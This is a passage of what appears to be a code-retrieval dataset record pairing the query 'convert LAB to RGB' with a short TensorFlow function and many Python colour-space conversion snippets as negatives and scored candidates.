**kwargs):\r\n\r\n temp_X = cobj.xyz_x\r\n temp_Y = cobj.xyz_y\r\n temp_Z = cobj.xyz_z\r\n\r\n logger.debug(\" \\- Target RGB space: %s\", target_rgb)\r\n target_illum = target_rgb.native_illuminant\r\n logger.debug(\" \\- Target native illuminant: %s\", target_illum)\r\n logger.debug(\" \\- XYZ color's illuminant: %s\", cobj.illuminant)\r\n \r\n # If the XYZ values were taken with a different reference white than the\r\n # native reference white of the target RGB space, a transformation matrix\r\n # must be applied.\r\n if cobj.illuminant != target_illum:\r\n logger.debug(\" \\* Applying transformation from %s to %s \",\r\n cobj.illuminant, target_illum)\r\n # Get the adjusted XYZ values, adapted for the target illuminant.\r\n temp_X, temp_Y, temp_Z = apply_chromatic_adaptation(\r\n temp_X, temp_Y, temp_Z,\r\n 
orig_illum=cobj.illuminant, targ_illum=target_illum)\r\n logger.debug(\" \\* New values: %.3f, %.3f, %.3f\",\r\n temp_X, temp_Y, temp_Z)\r\n \r\n # Apply an RGB working space matrix to the XYZ values (matrix mul).\r\n rgb_r, rgb_g, rgb_b = apply_RGB_matrix(\r\n temp_X, temp_Y, temp_Z,\r\n rgb_type=target_rgb, convtype=\"xyz_to_rgb\")\r\n\r\n # v\r\n linear_channels = dict(r=rgb_r, g=rgb_g, b=rgb_b)\r\n # V\r\n nonlinear_channels = {}\r\n if target_rgb == sRGBColor:\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n if v <= 0.0031308:\r\n nonlinear_channels[channel] = v * 12.92\r\n else:\r\n nonlinear_channels[channel] = 1.055 * math.pow(v, 1 / 2.4) - 0.055\r\n else:\r\n # If it's not sRGB...\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n nonlinear_channels[channel] = math.pow(v, 1 / target_rgb.rgb_gamma)\r\n\r\n return target_rgb(\r\n nonlinear_channels['r'], nonlinear_channels['g'], nonlinear_channels['b'])", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def pos2im_coordinates(x, z):\n # x_lim = [-0.85, 0.86]\n # z_lim = [-1.22, 0.47]\n x_lim = [-0.365, 0.365]\n z_lim = [-0.95, -0.24]\n\n pix_x = int(127 * (x_lim[1] - x) / (x_lim[1] - x_lim[0]))\n pix_z = int(127 * (z_lim[1] - z) / (z_lim[1] - z_lim[0]))\n return pix_x, pix_z", "def XYZ_to_RGB(XYZ,\n illuminant_XYZ,\n illuminant_RGB,\n XYZ_to_RGB_matrix,\n chromatic_adaptation_transform='CAT02',\n encoding_cctf=None):\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n transform=chromatic_adaptation_transform)\n\n XYZ_a = dot_vector(M, XYZ)\n\n RGB = dot_vector(XYZ_to_RGB_matrix, XYZ_a)\n\n if encoding_cctf is not None:\n RGB = encoding_cctf(RGB)\n\n return RGB", "def XYZ_to_RGB_matrix(self):\n\n if not self._use_derived_XYZ_to_RGB_matrix:\n return self._XYZ_to_RGB_matrix\n else:\n return self._derived_XYZ_to_RGB_matrix", "def test_adobe_conversion_to_xyz_d65(self):\r\n\r\n adobe = AdobeRGBColor(0.482, 0.784, 0.196)\r\n xyz = convert_color(adobe, XYZColor)\r\n self.assertColorMatch(xyz, XYZColor(0.230, 0.429, 0.074))", "def rgb_to_ycbcr(image: torch.Tensor) -> torch.Tensor:\n r: torch.Tensor = image[..., 0, :, :]\n g: torch.Tensor = image[..., 1, :, :]\n b: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n y: torch.Tensor = 0.299 * r + 0.587 * g + 0.114 * b\n cb: torch.Tensor = (b - y) * 0.564 + delta\n cr: torch.Tensor = (r - y) * 0.713 + delta\n return torch.stack([y, cb, cr], -3)", "def to_image(x):\n x = denorm(x.data.cpu())\n ndarr = x.mul(255).clamp(0, 255).byte().permute(1, 2, 0).cpu().numpy()\n im = ndarr\n return im", "def camera_to_pixel(self, X):\n raise NotImplementedError" ]
[ "0.6907906", "0.6867097", "0.68299574", "0.66412497", "0.66398394", "0.65136164", "0.6503859", "0.6343428", "0.6280779", "0.6266033", "0.62629265", "0.620036", "0.61658543", "0.6152105", "0.60904413", "0.6024829", "0.5986624", "0.59797454", "0.597226", "0.5968314", "0.59129363", "0.58743936", "0.58658713", "0.58486485", "0.5839945", "0.58384067", "0.58263016", "0.58202267", "0.5802494", "0.57842463" ]
0.7601516
0
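A minimal usage sketch for the rgb_to_xyz document above (this assumes TensorFlow 2.x with eager execution; the D65 white-point reference values in the comment are standard constants, not taken from this record):

import tensorflow as tf

# One pure-white pixel, shape (1, 1, 3).
white = tf.constant([[[255.0, 255.0, 255.0]]])
xyz = rgb_to_xyz(white)
# Pure sRGB white should land near the D65 reference white.
print(xyz.numpy())  # approximately [[[95.05, 100.0, 108.9]]]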
Convert an image from RGB color space to LAB color space (RGB > XYZ > LAB)
def rgb_to_lab(image: tf.Tensor) -> tf.Tensor:
    xyz = rgb_to_xyz(image)
    lab_image = xyz_to_lab(xyz)
    return lab_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def lab_to_rgb(img_l, img_ab):\n lab = np.empty([*img_l.shape[0:2], 3])\n lab[:, :, 0] = np.squeeze(((img_l + 1) * 50))\n lab[:, :, 1:] = img_ab * 127\n return color.lab2rgb(lab)", "def rgb_to_lab(img, l=False, ab=False):\n img = img / 255\n l_chan = color.rgb2lab(img)[:, :, 0]\n l_chan = l_chan / 50 - 1\n l_chan = l_chan[..., np.newaxis]\n\n ab_chan = color.rgb2lab(img)[:, :, 1:]\n ab_chan = (ab_chan + 128) / 255 * 2 - 1\n if l:\n return l_chan\n else:\n return ab_chan", "def rgb2lab(r, g, b):\n r, g, b = r / 255.0, g / 255.0, b / 255.0\n\n # http://www.brucelindbloom.com/index.html?Math.html\n # Inverse sRGB Companding\n r = r / 12.92 if r <= 0.04045 else ((r + 0.055) / 1.055) ** 2.4\n g = g / 12.92 if g <= 0.04045 else ((g + 0.055) / 1.055) ** 2.4\n b = b / 12.92 if b <= 0.04045 else ((b + 0.055) / 1.055) ** 2.4\n\n # http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html\n # sRGB, D65\n x = r * 0.4124564 + g * 0.3575761 + b * 0.1804375\n y = r * 0.2126729 + g * 0.7151522 + b * 0.0721750\n z = r * 0.0193339 + g * 0.1191920 + b * 0.9503041\n\n # http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_Lab.html\n kappa, epsilon = 903.3, 0.008856\n\n # http://brucelindbloom.com/index.html?Eqn_ChromAdapt.html\n # White point for D65\n xr, yr, zr = x / 0.95047, y / 1.00000, z / 1.08883\n\n fx = xr ** (1 / 3.0) if xr > epsilon else (kappa * xr + 16) / 116.0\n fy = yr ** (1 / 3.0) if yr > epsilon else (kappa * yr + 16) / 116.0\n fz = zr ** (1 / 3.0) if zr > epsilon else (kappa * zr + 16) / 116.0\n\n l = 166.0 * fy - 16.0\n a = 500.0 * (fx - fy)\n b = 200.0 * (fy - fz)\n\n return l, a, b", "def XYZ_to_Lab(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n temp_x = cobj.xyz_x / illum[\"X\"]\r\n temp_y = cobj.xyz_y / illum[\"Y\"]\r\n temp_z = cobj.xyz_z / illum[\"Z\"]\r\n \r\n if temp_x > color_constants.CIE_E:\r\n temp_x = math.pow(temp_x, (1.0 / 3.0))\r\n else:\r\n temp_x = (7.787 * temp_x) + (16.0 / 116.0) \r\n\r\n if temp_y > color_constants.CIE_E:\r\n temp_y = math.pow(temp_y, (1.0 / 3.0))\r\n else:\r\n temp_y = (7.787 * temp_y) + (16.0 / 116.0)\r\n \r\n if temp_z > color_constants.CIE_E:\r\n temp_z = math.pow(temp_z, (1.0 / 3.0))\r\n else:\r\n temp_z = (7.787 * temp_z) + (16.0 / 116.0)\r\n \r\n lab_l = (116.0 * temp_y) - 16.0\r\n lab_a = 500.0 * (temp_x - temp_y)\r\n lab_b = 200.0 * (temp_y - temp_z)\r\n return LabColor(\r\n lab_l, lab_a, lab_b, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb2Lab(rgbvalue):\r\n RGB2Lab_Matrix = np.array([[0.412453, 0.357580, 0.180423],\r\n [0.212671, 0.715160, 0.072169],\r\n [0.019334, 0.119193, 0.950227]])\r\n R = rgbvalue[0]\r\n G = rgbvalue[1]\r\n B = rgbvalue[2]\r\n gammaR = gamma(R / 255.0)\r\n gammaG = gamma(G / 255.0)\r\n gammaB = gamma(B / 255.0)\r\n RGBvalue = np.array([gammaR, gammaG, gammaB])\r\n RGBvalue = RGBvalue.reshape(3, 1)\r\n XYZvalue = np.dot(RGB2Lab_Matrix, RGBvalue)\r\n assert XYZvalue.shape == (3, 1)\r\n correction = np.array([[1.0 / 0.950456, 1.0, 1.0 / 1.088754]]).T\r\n assert correction.shape == (3, 1)\r\n XYZ = XYZvalue * correction\r\n assert 
XYZ.shape == (3, 1)\r\n YYn = ft(XYZ[1])\r\n XXn = ft(XYZ[0])\r\n ZZn = ft(XYZ[2])\r\n L = 116 * YYn - 16\r\n a = 500 * (XXn - YYn)\r\n b = 200 * (YYn - ZZn)\r\n return [int(L), int(a), int(b)]", "def sRGBToLab(rgb):\n return xyzToLab(xyzFromsRGB(rgb), [0.9504559, 1, 1.089058])", "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def luv_to_rgb(image: torch.Tensor, eps: float = 1e-12) -> torch.Tensor:\n if not isinstance(image, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(image)}\")\n\n if len(image.shape) < 3 or image.shape[-3] != 3:\n raise ValueError(f\"Input size must have a shape of (*, 3, H, W). Got {image.shape}\")\n\n L: torch.Tensor = image[..., 0, :, :]\n u: torch.Tensor = image[..., 1, :, :]\n v: torch.Tensor = image[..., 2, :, :]\n\n # Convert from Luv to XYZ\n y: torch.Tensor = torch.where(L > 7.999625, torch.pow((L + 16) / 116, 3.0), L / 903.3)\n\n # Compute white point\n xyz_ref_white: Tuple[float, float, float] = (0.95047, 1.0, 1.08883)\n u_w: float = (4 * xyz_ref_white[0]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n v_w: float = (9 * xyz_ref_white[1]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n\n a: torch.Tensor = u_w + u / (13 * L + eps)\n d: torch.Tensor = v_w + v / (13 * L + eps)\n c: torch.Tensor = 3 * y * (5 * d - 3)\n\n z: torch.Tensor = ((a - 4) * c - 15 * a * d * y) / (12 * d + eps)\n x: torch.Tensor = -(c / (d + eps) + 3.0 * z)\n\n xyz_im: torch.Tensor = torch.stack([x, y, z], -3)\n\n rgbs_im: torch.Tensor = xyz_to_rgb(xyz_im)\n\n # Convert from RGB Linear to sRGB\n rgb_im = linear_rgb_to_rgb(rgbs_im)\n\n return rgb_im", "def rgb2alpha(img):\n\t### First of all we need the size of our picture to make the transforms\n\n\tx = len(img) ; y = len(img[0])\n\talpha = np.full((x, y, 3), 0, dtype = float)\t\t## This will be the transformed image\n\n\t### Now we gotta access each pixel of the picture\n\n\tfor i, vi in enumerate(img):\n\t\tfor j, px in enumerate(vi):\n\t\t\t### There we are\n\n\t\t\t# Step 1 : LMS transform, for that we use r_l\n\n\t\t\talpha[i][j] = np.matmul(r_l, px)\n\n\t\t\t# Step 2 : log em all (decimal log)\n\n\t\t\talpha[i][j][0] = log(alpha[i][j][0])\n\t\t\talpha[i][j][1] = log(alpha[i][j][1])\n\t\t\talpha[i][j][2] = log(alpha[i][j][2])\n\n\t\t\t# Step 3 : l alpha beta transform, by using l_a\n\n\t\t\talpha[i][j] = np.matmul(l_a, alpha[i][j])\n\n\treturn alpha", "def sRGBFromLab(lab):\n return xyzTosRGB(labToXYZ(lab, [0.9504559, 1, 1.089058]))", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using 
a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:\n l, a, b = tf.unstack(image, axis=-1)\n\n var_y = (l + 16) / 116\n var_x = a / 500 + var_y\n var_z = var_y - b / 200\n var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),\n (var_x - 16 / 116) / 7.787)\n var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),\n (var_y - 16 / 116) / 7.787)\n var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),\n (var_z - 16 / 116) / 7.787)\n\n refx = 95.047\n refy = 100.00\n ref_z = 108.883\n\n x = var_x * refx\n y = var_y * refy\n z = var_z * ref_z\n xyz_image = tf.stack([x, y, z], axis=-1)\n return xyz_image", "def sRGBToLabD50(rgb):\n return xyzToLab(xyzFromsRGBD50(rgb), [0.9642957, 1, 0.8251046])", "def xyz_to_lab(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n\n refx = 95.047\n refy = 100.00\n refz = 108.883\n\n var_x = x / refx\n var_y = y / refy\n var_z = z / refz\n\n var_x = tf.where(var_x > 0.008856, tf.pow(var_x, 1 / 3),\n (7.787 * var_x) + (16 / 116))\n var_y = tf.where(var_y > 0.008856, tf.pow(var_y, 1 / 3),\n (7.787 * var_y) + (16 / 116))\n var_z = tf.where(var_z > 0.008856, tf.pow(var_z, 1 / 3),\n (7.787 * var_z) + (16 / 116))\n\n l = (116 * var_y) - 16\n a = 500 * (var_x - var_y)\n b = 200 * (var_y - var_z)\n lab_image = tf.stack([l, a, b], axis=-1)\n return lab_image", "def example_lab_to_rgb():\r\n\r\n print(\"=== RGB Example: Lab->RGB ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.217)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n rgb = convert_color(lab, sRGBColor)\r\n print(rgb)\r\n print(\"=== End Example ===\\n\")", "def sRGBFromLabD50(lab):\n return xyzTosRGBD50(labToXYZ(lab, [0.9642957, 1, 0.8251046]))", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def l_to_rgb(img_l):\n lab = np.squeeze(255 * (img_l + 1) / 2)\n return color.gray2rgb(lab) / 255", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def example_lab_to_xyz():\r\n\r\n print(\"=== Simple Example: Lab->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.22)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n xyz = convert_color(lab, XYZColor)\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + 
var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def matplotlib_image(image):\n if image.ndim == 2:\n rgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n else:\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return rgb", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def sRGBLuminance(x):\n lin=linearFromsRGB3(x)\n return lin[0]*0.2126+lin[1]*0.7152+lin[2]*0.0722", "def rgb_to_luv(image: torch.Tensor, eps: float = 1e-12) -> torch.Tensor:\n if not isinstance(image, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(image)}\")\n\n if len(image.shape) < 3 or image.shape[-3] != 3:\n raise ValueError(f\"Input size must have a shape of (*, 3, H, W). 
Got {image.shape}\")\n\n # Convert from sRGB to Linear RGB\n lin_rgb = rgb_to_linear_rgb(image)\n\n xyz_im: torch.Tensor = rgb_to_xyz(lin_rgb)\n\n x: torch.Tensor = xyz_im[..., 0, :, :]\n y: torch.Tensor = xyz_im[..., 1, :, :]\n z: torch.Tensor = xyz_im[..., 2, :, :]\n\n threshold = 0.008856\n L: torch.Tensor = torch.where(y > threshold, 116.0 * torch.pow(y.clamp(min=threshold), 1.0 / 3.0) - 16.0, 903.3 * y)\n\n # Compute reference white point\n xyz_ref_white: Tuple[float, float, float] = (0.95047, 1.0, 1.08883)\n u_w: float = (4 * xyz_ref_white[0]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n v_w: float = (9 * xyz_ref_white[1]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n\n u_p: torch.Tensor = (4 * x) / (x + 15 * y + 3 * z + eps)\n v_p: torch.Tensor = (9 * y) / (x + 15 * y + 3 * z + eps)\n\n u: torch.Tensor = 13 * L * (u_p - u_w)\n v: torch.Tensor = 13 * L * (v_p - v_w)\n\n out = torch.stack([L, u, v], dim=-3)\n\n return out", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def colorize_images(self, img):\n self.load_model()\n self.mdn.eval()\n self.vae.eval()\n n, _, _ = img.shape\n img = img.astype(np.float32) / 255\n img = torch.tensor(img, dtype=torch.float, device=self.device).unsqueeze(1)\n with torch.no_grad():\n z = self.mdn(img)\n ab_out = self.vae.decode(z)\n lab_out = torch.cat((img, ab_out), dim=1)\n lab_out = self.unnormalize(lab_out).cpu().numpy()\n lab_out = np.transpose(lab_out, (0, 2, 3, 1)).astype(np.uint8)\n for i in range(n):\n color_out = cv2.cvtColor(lab_out[i], cv2.COLOR_LAB2BGR)\n color_out = cv2.resize(color_out, (96, 96), interpolation=cv2.INTER_AREA)\n cv2.imwrite(\"../datasets/stl10/divcolor/{}.png\".format(str(i)), color_out)\n return" ]
[ "0.76128566", "0.736024", "0.7093746", "0.70733243", "0.688894", "0.67929274", "0.67809963", "0.6703727", "0.66217625", "0.6567671", "0.6539482", "0.6528808", "0.6519189", "0.64457124", "0.64197767", "0.63783777", "0.637468", "0.630608", "0.6248861", "0.6204791", "0.618432", "0.6093022", "0.60678786", "0.6041543", "0.6036307", "0.6030892", "0.59891975", "0.59683686", "0.5943061", "0.5936455" ]
0.7743007
0
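A hedged sanity check for the rgb_to_lab document above; it assumes TensorFlow 2.x and that rgb_to_xyz (from the previous record) and an xyz_to_lab implementation (one appears among this record's negatives) are in scope:

import tensorflow as tf

white = tf.constant([[[255.0, 255.0, 255.0]]])
lab = rgb_to_lab(white)
# D65 white maps to roughly L = 100, a = 0, b = 0 in CIE L*a*b*.
print(lab.numpy())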
Convert an image from LAB color space to RGB color space (LAB > XYZ > RGB)
def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:
    xyz = lab_to_xyz(image)
    rgb_image = xyz_to_rgb(xyz)
    return rgb_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def rgb_to_lab(image: tf.Tensor) -> tf.Tensor:\n xyz = rgb_to_xyz(image)\n lab_image = xyz_to_lab(xyz)\n return lab_image", "def lab_to_rgb(img_l, img_ab):\n lab = np.empty([*img_l.shape[0:2], 3])\n lab[:, :, 0] = np.squeeze(((img_l + 1) * 50))\n lab[:, :, 1:] = img_ab * 127\n return color.lab2rgb(lab)", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def sRGBFromLab(lab):\n return xyzTosRGB(labToXYZ(lab, [0.9504559, 1, 1.089058]))", "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def example_lab_to_rgb():\r\n\r\n print(\"=== RGB Example: Lab->RGB ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.217)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n rgb = convert_color(lab, sRGBColor)\r\n print(rgb)\r\n print(\"=== End Example ===\\n\")", "def rgb2Lab(rgbvalue):\r\n RGB2Lab_Matrix = np.array([[0.412453, 0.357580, 0.180423],\r\n [0.212671, 0.715160, 0.072169],\r\n [0.019334, 0.119193, 0.950227]])\r\n R = rgbvalue[0]\r\n G = rgbvalue[1]\r\n B = rgbvalue[2]\r\n gammaR = gamma(R / 255.0)\r\n gammaG = gamma(G / 255.0)\r\n gammaB = gamma(B / 255.0)\r\n RGBvalue = np.array([gammaR, gammaG, gammaB])\r\n RGBvalue = RGBvalue.reshape(3, 1)\r\n XYZvalue = np.dot(RGB2Lab_Matrix, RGBvalue)\r\n assert XYZvalue.shape == (3, 1)\r\n correction = np.array([[1.0 / 0.950456, 1.0, 1.0 / 1.088754]]).T\r\n assert correction.shape == (3, 1)\r\n XYZ = XYZvalue * correction\r\n assert XYZ.shape == (3, 1)\r\n YYn = ft(XYZ[1])\r\n XXn = ft(XYZ[0])\r\n ZZn = ft(XYZ[2])\r\n L = 116 * YYn - 16\r\n a = 500 * (XXn - YYn)\r\n b = 200 * (YYn - ZZn)\r\n return [int(L), int(a), int(b)]", "def XYZ_to_Lab(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n temp_x = cobj.xyz_x / illum[\"X\"]\r\n temp_y = cobj.xyz_y / illum[\"Y\"]\r\n temp_z = cobj.xyz_z / illum[\"Z\"]\r\n \r\n if temp_x > color_constants.CIE_E:\r\n temp_x = math.pow(temp_x, (1.0 / 3.0))\r\n else:\r\n temp_x = (7.787 * temp_x) + (16.0 / 116.0) \r\n\r\n if temp_y > color_constants.CIE_E:\r\n temp_y = math.pow(temp_y, (1.0 / 
3.0))\r\n else:\r\n temp_y = (7.787 * temp_y) + (16.0 / 116.0)\r\n \r\n if temp_z > color_constants.CIE_E:\r\n temp_z = math.pow(temp_z, (1.0 / 3.0))\r\n else:\r\n temp_z = (7.787 * temp_z) + (16.0 / 116.0)\r\n \r\n lab_l = (116.0 * temp_y) - 16.0\r\n lab_a = 500.0 * (temp_x - temp_y)\r\n lab_b = 200.0 * (temp_y - temp_z)\r\n return LabColor(\r\n lab_l, lab_a, lab_b, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb_to_lab(img, l=False, ab=False):\n img = img / 255\n l_chan = color.rgb2lab(img)[:, :, 0]\n l_chan = l_chan / 50 - 1\n l_chan = l_chan[..., np.newaxis]\n\n ab_chan = color.rgb2lab(img)[:, :, 1:]\n ab_chan = (ab_chan + 128) / 255 * 2 - 1\n if l:\n return l_chan\n else:\n return ab_chan", "def rgb2lab(r, g, b):\n r, g, b = r / 255.0, g / 255.0, b / 255.0\n\n # http://www.brucelindbloom.com/index.html?Math.html\n # Inverse sRGB Companding\n r = r / 12.92 if r <= 0.04045 else ((r + 0.055) / 1.055) ** 2.4\n g = g / 12.92 if g <= 0.04045 else ((g + 0.055) / 1.055) ** 2.4\n b = b / 12.92 if b <= 0.04045 else ((b + 0.055) / 1.055) ** 2.4\n\n # 